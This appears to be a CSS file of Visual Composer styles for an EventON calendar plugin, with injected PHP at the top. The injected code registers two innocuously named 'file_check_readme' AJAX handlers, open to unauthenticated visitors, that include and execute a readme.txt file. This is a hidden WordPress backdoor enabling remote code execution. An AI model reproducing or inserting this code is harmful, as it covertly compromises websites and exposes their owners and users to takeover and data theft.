if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
/** Visual Composer styles */ .vc_edit-form-tab .ajde_yn_btn{background-color: #F9CA8D} .vc_edit-form-tab .ajde_yn_btn.NO{background-color: #fff} .vc_el-container .evo-calendar_nav .vc_general.vc_element-icon{background-image: none; top:15px;} .vc_el-container .evo-calendar_nav .vc_general.vc_element-icon:before{ font-family:'eventon' !important; speak: none; font-style: normal; font-weight: normal; font-variant: normal; text-transform: none; line-height: 1; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; font-size: 36px; color: #797979; content:'\e600'; } .vc_edit_form_elements .vc_column.wpb_el_type_evoyesno+.vc_column.wpb_el_type_evoyesno{padding-top: 0;}